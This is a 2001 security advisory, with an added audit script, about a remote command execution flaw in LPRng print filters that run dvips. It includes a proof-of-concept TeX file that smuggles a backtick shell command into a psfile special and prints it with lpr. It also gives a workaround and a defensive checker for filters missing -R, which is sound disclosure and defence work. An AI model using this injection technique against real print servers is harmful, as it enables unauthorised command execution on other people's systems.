[UNIX] LPRng/rhs-printfilters Vulnerability Leads to Remote Execution of Commands

From: support@securiteam.com
Date: 09/03/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [UNIX] LPRng/rhs-printfilters Vulnerability Leads to Remote Execution of Commands
Message-Id: <20010903192614.3C97E138C0@mail.der-keiler.de>
Date: Mon,  3 Sep 2001 21:26:14 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  LPRng/rhs-printfilters Vulnerability Leads to Remote Execution of Commands
------------------------------------------------------------------------

SUMMARY

If the lpd is listening on 0.0.0.0 and no access controls are in place, it
is possible to execute commands as the lp user, assuming tetex-dvips is
installed.

DETAILS

Unless dvips is passed the -R option, the example file below, after being
converted to a .dvi file (tex spool.tex), will execute the embedded command
when it is printed.

Workaround:
Modify /usr/lib/rhs/rhs-printfilters/dvi-to-ps.fpi
..
dvips -f $DVIPS_OPTIONS < $TMP_FILE
..

To:
..
dvips -R -f $DVIPS_OPTIONS < $TMP_FILE
..

This makes it safer.
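
One way to check a filter script for the condition the workaround fixes, as an added example that is not part of the original advisory: it reports every dvips invocation that lacks -R. The function names and the sample filter are constructed for illustration, and the handling of -R0/-R1/-R2 assumes the option forms of later dvips releases.

```sh
#!/bin/sh
# Added example: report dvips invocations in a print filter that lack -R.
# audit_dvips_filter and demo are hypothetical names, not part of LPRng
# or rhs-printfilters.
# Returns 0 if every dvips call has -R, 1 if any does not, 2 if unreadable.
audit_dvips_filter() {
    filter=$1
    [ -r "$filter" ] || { echo "cannot read $filter" >&2; return 2; }
    awk -v f="$filter" '
        /^[ \t]*#/ { next }                     # ignore comment lines
        {
            n = split($0, tok, /[ \t]+/)
            calls = 0; secure = 0
            for (i = 1; i <= n; i++) {
                # dvips as a command word, bare or with a leading path
                if (tok[i] == "dvips" || tok[i] ~ /[^A-Za-z0-9_.-]dvips$/)
                    calls = 1
                # -R must be its own option. Later dvips releases also take
                # -R1/-R2; -R0 switches the protection off, so it is not
                # counted as secure.
                else if (calls && tok[i] ~ /^-R[12]?$/)
                    secure = 1
            }
            if (calls && !secure) {
                printf "%s:%d: %s\n", f, NR, $0
                bad = 1
            }
        }
        END { exit bad + 0 }
    ' "$filter"
}

# Constructed sample: the two forms of the dvips line quoted above.
demo() {
    tmp=$(mktemp) || return 2
    printf '%s\n' '# constructed sample filter' \
        'dvips -f $DVIPS_OPTIONS < $TMP_FILE' \
        'dvips -R -f $DVIPS_OPTIONS < $TMP_FILE' > "$tmp"
    audit_dvips_filter "$tmp" && rc=0 || rc=$?
    rm -f "$tmp"
    return "$rc"
}

# With a path argument audit that file, otherwise run the constructed demo.
if [ $# -gt 0 ]; then audit_dvips_filter "$1"; else demo || :; fi
```

A flagged line can still be safe if -R reaches dvips through $DVIPS_OPTIONS, so check how that variable is set before treating a report as a finding.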

Proof of concept:
Use this to test your machine:
cat >proof-of-concept.tex <<'EOF'
\special{psfile="`touch /tmp/lpowned"}
\end
EOF
tex proof-of-concept
lpr proof-of-concept.dvi

ADDITIONAL INFORMATION

The information has been provided by zen-parse <zen-parse@gmx.net>.
